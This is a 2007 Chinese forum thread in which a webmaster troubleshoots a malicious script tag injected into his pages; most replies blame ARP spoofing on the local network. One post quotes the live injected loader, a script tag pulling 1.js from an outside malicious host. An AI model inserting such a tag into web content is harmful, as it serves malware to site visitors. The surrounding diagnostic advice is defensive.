Chinaunix

标题: 今天出现了奇怪的问题,网页病毒 [打印本页]

作者: hq22    时间: 2007-01-27 11:35
标题: 今天出现了奇怪的问题,网页病毒
今天早上,突然发现浏览自己网站的某些网页,瑞星报出病毒,查看源文件一看,在<html>的最先面加了一段js代码,明显就是那段代码在作怪,马上进入服务器看,可是那个网页好好的,并没有被修改,纳闷,于是以为自己的电脑有毒,可是,一会儿时间,接连接到电话说我们网站有病毒,于是又怀疑是服务器给黑,不过始终不知所解,那个文件根本就没这个病毒代码阿,不过过了一段时间,一个多小时,尽然又好了,刷新网页,那段病毒代码没有了。
今天有没有人碰到我一样的情况阿,我现在怀疑是电信的缘故,在传送过程中被加入这段代码,我的猜测会是正确的吗?如果是服务器的话,那麻烦就大了,说明被黑客黑了
作者: ryanmm    时间: 2007-01-27 13:15
你网页里是不是 调用了其他js 或者 iframe
检查一下相应的 .js 和 嵌入页面

再者,你服务器肯定是被人攻击了
检查一下吧

作者: platinum    时间: 2007-01-27 13:29
我现在怀疑是电信的缘故,在传送过程中被加入这段代码,我的猜测会是正确的吗?

这个绝不可能,是服务器的原因,是被黑了还是自己中毒了有待考证
如果你保存了当时看到的 js 部分代码,可以搜索一下整个网站目录下的所有文件是否包含这段关键字
作者: jd_chen    时间: 2007-01-27 14:58
你把自己保存的JS代码找点关键字,再到/var/www/html或者你自己的网页目录下cat *.html|grep ???看看有没有那些JS代码吧?行的话,给我分哦~~呵呵,因为,我要拿50分出来给人帮我呀~~

作者: showsa    时间: 2007-01-27 15:26
前短时间听说过消息

说有人在中间路由上投放病毒,不知真假
作者: jd_chen    时间: 2007-01-27 19:07
原帖由 showsa 于 2007-1-27 15:26 发表于 5楼  
前短时间听说过消息

这个不可能吧,除非是电信的人,要不,如果有路由的ID,绝对不会做这种蠢事的,有很多其它的事可以做~~
作者: 網中人    时间: 2007-01-27 21:00
如果有做 tripwire 或備份的習慣,也可先拿來比較,找出有哪些文件被修改過。
在碰到問題那當時,要是你要對系統做 snapshot,那對後面的除錯也很有幫助。
要是你的主機不是你所管的,只是放在別人的 colocation ,那可能的原因就無限多了。

anyway,有發現問題是好事,總被完全不知道要好了...  ^_^
作者: 飘雪心辰    时间: 2007-01-27 23:34
原帖由 hq22 于 2007-1-27 11:35 发表于 1楼  
今天早上,突然发现浏览自己网站的某些网页,瑞星报出病毒,查看源文件一看,在<html>的最先面加了一段js代码,明显就是那段代码在作怪,马上进入服务器看,可是那个网页好好的,并没有被修改,纳闷,于是 ...

=================
既然浏览器上报出病毒,那么网页里面恳定是有的,不过这段病毒代码放在哪里就要你好好的思量一下了,如果是直接放在网页里的找一下很简单的,用关键字检索(自己在浏览器源文件中截取几个关键字),如果是调用别的网站的代码,你也可用关键字检索(不太灵了),不过对于整个网站文件的目录结构最好是一清二楚的,我就怕,这段病毒代码放在数据库里,那要你对整站的代码熟悉,否则的话,我估计你很难查得到恶意代码到底放在哪张表里。
作者: hq22    时间: 2007-01-28 09:22
原帖由 showsa 于 2007-1-27 15:26 发表于 5楼  
前短时间听说过消息

我觉的是这个可能,不知道确切不确切?其他情况基本上可排除,网页文件是我自己写的,结构一清二楚,有的页面没有调用数据库,在浏览器上也有这段代码,另外服务器是自己的,就放了一个网站,没其他任何应用,再则,网站上有些页面有这个病毒,而其他一些页面又没有,还有,来的突然,去的也突然。
所以我估计不是服务器原因,察看网页文件,修改时间都是旧的,并且网页文件上不存在任何可能的那段代码,除非服务器中病毒,有进程在生成页面时自动加上。
作者: fuyic    时间: 2007-01-28 12:11
有非法劫持这个说法吧,有的时候使用CDN,在CDN的镜像上会有被人恶意修改加入病毒的情况,前些日子遇到过一次,不过楼主这个好像没用上CDN,不知道是不是和我说的状况差不多。
作者: HonestQiao    时间: 2007-01-28 13:24
原帖由 hq22 于 2007-1-28 09:22 发表于 9楼  

我觉的是这个可能,不知道确切不确切?其他情况基本上可排除,网页文件是我自己写的,结构一清二楚,有的页面没有调用数据库,在浏览器上也有这段代码,另外服务器是自己的,就放了一个网站,没其他任何应用 ...

楼主可以按照我的步骤测试一下子么?

步骤如下:
1. 你在你当前的电脑访问这个网页,是否出现类似的问题?
2. 如果1成立,则让其他地方的网友访问1的页面,是否出现问题?
3. 在服务器,通过wget来访问1的网页,然后把文件下载回来,看看是否有类似的问题?

这样子我们可以很快的锁定问题可能的范围。
作者: hq22    时间: 2007-01-28 14:19
原帖由 HonestQiao 于 2007-1-28 13:24 发表于 11楼  

楼主可以按照我的步骤测试一下子么?

步骤如下:
1. 你在你当前的电脑访问这个网页,是否出现类似的问题?
2. 如果1成立,则让其他地方的网友访问1的页面,是否出现问题?
3. 在服务器,通过wget来访 ...

1,2都出现这个问题,3没有试,当时有想到就好了,可惜现在没有这个问题了。从页面突然出现病毒跟突然消失看,网页文件被改得可能性很少。我还是估计是服务器托管商的什么设备出问题,而不是我的服务器。
作者: platinum    时间: 2007-01-28 21:08
前短时间听说过消息

不可能
路由是网络层的东西,网页是应用层的东西
作者: mailjzwu_1    时间: 2007-01-29 02:35
有可能是你使用计数器,或其他链接其他网站的
查一下,数据库表也值得怀疑,有时设计程序是,做什么加密,有MD5之类等转换,查起来,不是自己做的程序,查起来没头没尾的,特别不规范说明和代码的,更不用看
无论是ASP, PHP,都会有给人加入病毒代码的可能性,.net, jsp相对少点机会.
连接数据库文件有没给加东东在里面
作者: artou    时间: 2007-01-29 11:22
和我前一阶段遇到的问题差不多
1、你把apache换个端口看看那段js代码还在不在?
2、用同一个网段的其它服务器访问这个网页看看?
3、服务器彻底检查一下。

如果是在路由上被修改,那是没有解决办法的。。。只能换机房。。。
作者: skylove    时间: 2007-01-29 12:22
楼主是租用的虚拟主机吗? 如果是的话。。。我大概知道问题出在哪了
作者: HonestQiao    时间: 2007-01-29 15:07
原帖由 skylove 于 2007-1-29 12:22 发表于 16楼  
楼主是租用的虚拟主机吗? 如果是的话。。。我大概知道问题出在哪了

ext_filter可以做到这个。
作者: artou    时间: 2007-01-29 15:17
原帖由 HonestQiao 于 2007-1-29 15:07 发表于 17楼  

ext_filter可以做到这个。

请介绍一下ext_filter。。。
作者: hq22    时间: 2007-01-29 15:19
原帖由 artou 于 2007-1-29 11:22 发表于 15楼  
和我前一阶段遇到的问题差不多
1、你把apache换个端口看看那段js代码还在不在?
2、用同一个网段的其它服务器访问这个网页看看?
3、服务器彻底检查一下。

如果是在路由上被修改,那是没有解决办法的。。 ...

你是怎么个情况?查处问题来了吗?
我是自己的服务器,就运行了一个网站,linux+apache2.2+php5+mysql5,按道理页面被植入代码应该是服务器上的文件也被修改,可是我进去看服务器上页面并没有被任何改动,就是在IE上浏览的时候,莫名在页面最前面多出<script src=http://www.xxx.com/1.js></script>这段代码,这个网址我忘记了。
作者: 飘雪心辰    时间: 2007-01-29 15:44
============================
你的php不是配置成自动附加某一文件的话 ,你的这段调用js的代码恳定是在你服务器上的。
楼主呀,我就算是代表我们这一些人,能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。

是福不是祸,是祸躲不过。

作者: artou    时间: 2007-01-29 15:44
我的情况和你有点不同,我是网页里有个链接地址被修改了。但本机正常,apache换端口访问正常,同一网段其它机器访问正常。在这里和linuxsir发帖,都无人回答,最终也没查出问题。。。
作者: hq22    时间: 2007-01-29 16:01
原帖由 飘雪心辰 于 2007-1-29 15:44 发表于 20楼  
============================
你的php不是配置成自动附加某一文件的话 ,你的这段调用js的代码恳定是在你服务器上的。
楼主呀,我就算是代表我们这一些人,能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。 ...

现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。
作者: jd_chen    时间: 2007-01-29 17:22
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  

<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。

我的机子,卡吧开这个网页,不怕吧?
作者: skylove    时间: 2007-01-29 18:17
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  

您给的这个url的ip是来自 61.152.114.102 ,请核对是否与您的租用主机在同一主机上?或者同一段ip内??? 如果是的话,在server上动了手脚地可能性粉大;

如果不是,那么能否说说您的web构成:比如server那边是使用什么脚本语言,或者如果是静态html的话是否存在从数据库里取广告,或者取第三方数据/js调用的情形???
作者: skylove    时间: 2007-01-29 18:25
访问了那页面。。。最后出来个。。。

锄禾日当午
作者: hq22    时间: 2007-01-29 18:48
原帖由 skylove 于 2007-1-29 18:17 发表于 24楼  

您给的这个url的ip是来自 61.152.114.102 ,请核对是否与您的租用主机在同一主机上?或者同一段ip内??? 如果是的话,在server上动了手脚地可能性粉大;

如果不是,那么能否说说您的web构成:比如serv ...

我的ip段是202.,跟他无关,网页文件是我写的,没有你说的任何可能,我基本确定不是网页文件原因,要么是网络传输过程中添加的,要么是服务器被开了什么进程,等访问网页时候自动添加上去的。
作者: platinum    时间: 2007-01-29 18:49
问一下楼主,这个现象还有可能重现吗?
另外,apache 的日志里有什么敏感信息没有,包括 access 和 error 里面,在发现有病毒的时间前?
作者: artou    时间: 2007-01-30 14:39
经过测试使用Ext_Filter可以达到修改网页任何部分的功能,但是必须修改apache的conf来达到,如果conf未被修改,那是怎么达到的呢?
作者: xmbbx    时间: 2007-01-30 14:59
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.
作者: 飘雪心辰    时间: 2007-01-30 15:29
==================
你可对准网站目录,先检索里面有没直接包含此文件的页面。
比如检索/var/www/html/目录:

1. grep -Ri '1.js' /var/www/html/
  2. grep -Ri '9999' /var/www/html/
  3. grep -Ri 'waigua' /var/www/html/
复制代码

有没结果。
你用php,那php的配置文件里面这两 语句后面有没什么东东:
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =

作者: artou    时间: 2007-01-30 16:10
原帖由 xmbbx 于 2007-1-30 14:59 发表于 29楼  
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.

能再说的详细点吗?
作者: 網中人    时间: 2007-01-30 16:12
網頁是你自己寫的沒問題。
但機器也是“整台”由你自己來管?

如果你是放在別人的機房,請確定你機器的“獨立性”。
作者: 山东大葱    时间: 2007-02-02 21:11
今天有没有人碰到我一样的情况阿,我现在怀疑是电信的缘故,在传送过程中被加入这段代码,我的猜测会是正确的吗?如果是服务器的话,那麻烦就大了,说明被黑客黑了

纯属推卸责任!
---->网页木马!
服务器是否被攻破?管理员密码是否外泄?网页是否存在注入等漏洞?网站后台管理员密码是否强壮?密码是否已经MD5加密?网页什么时候修改的?是你修改的吗?去掉那段代码是否还提示有病毒?
作者: 第二场雪    时间: 2007-02-12 18:08
和你们说的都无关 这是arpsniffer的一种,数据包在送出到达网关的过程中被劫持 主要原因是内网有计算机被控制,通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性,所以劫持的成功率不一样。
呵呵。客户有次遇到过,最后原因就是这个,重装系统都没用,找出那个计算机是关键
作者: dy810810    时间: 2007-03-14 23:01
兄弟们,我的问题跟他差不多,比较相似,收集了一些资料,大家一起帮看看
http://linux.chinaunix.net/bbs/viewthread.php?tid=891773&extra=page%3D1
作者: yjypop    时间: 2007-03-15 12:00
是IIS的扩展里多了一个DLL调用,这个问题我见过
作者: tangbank    时间: 2007-05-05 14:50
第二场雪说的完全正确,
这是一种arp攻击,这个挂代码不是每次都成功的。
关键问题是如何找出arp攻击的服务器.
ps:这个服务器肯定和你的服务器在同一个网关下面的
作者: asklxf    时间: 2007-05-06 19:22
上次听说上海电信的一个路由器被黑客挟持了,所有经过的网页都被挂病毒,楼主打电话问问托管商
作者: oklinuxok    时间: 2007-05-08 14:40
可能被arp欺骗攻击了
作者: theanswer    时间: 2007-05-08 14:43
标题: 对比以前的备份
对比以前的备份对比以前的备份对比以前的备份
作者: 程序情人    时间: 2007-05-09 09:48
呵呵,关注一下

作者: tangbank    时间: 2007-05-23 23:50
还没解决阿。。。
作者: tangbank    时间: 2007-05-23 23:51
QQ:240075 可以给你一个工具
作者: 75106500    时间: 2007-05-28 02:19
呵可。。学到东西了~~~
作者: daxian195    时间: 2007-06-20 00:14
基本可以肯定是arp攻击。可以装一个arp防火墙,看局域岗内哪台机在攻击。先断掉它的网线,再杀毒,这样基本上就可以解决了。
作者: xdsnet    时间: 2007-06-25 09:52
要不是你局域网问题,被arp攻破了。
作者: ljcwmx    时间: 2007-06-25 11:08
ARP欺骗,是局域网中有的机器中招了!
作者: elog    时间: 2007-06-25 14:20
前段时间我所在的网络也出现了类似问题,经查是中了arp病毒,把局域网的的所有电脑的TCP/IP包都转到了其中的一台电脑里,那台电脑负责把含有http头的包取出来,加上病毒码,然后再发给局域网中的电脑,你可以去看看是不是这个原因。
作者: freyson    时间: 2007-07-10 17:05
这个问题我也碰到过,你只要用你的这台机器打开一些别的大的网站,看看是否有代码,如果都有,保证是你局域网内的毒,查杀一下.根据你的问题,我敢肯定是你的内网中毒了.
作者: 金西    时间: 2007-07-15 17:22
直接用抓包工具分析网络信息
作者: wheel    时间: 2007-07-20 14:01
载入 http://waigua9999.com 时发生错误:

服务器超时
到主机 waigua9999.com 端口 80 的连接
作者: wheel    时间: 2007-07-20 14:04
如果你的服务器是linux那就ssh 到服务器lynx http://127.0.0.1 看下,不就明白是否是net的问题还是本机给黑了?

欢迎光临 Chinaunix (http://bbs.chinaunix.net/) Powered by Discuz! X3.2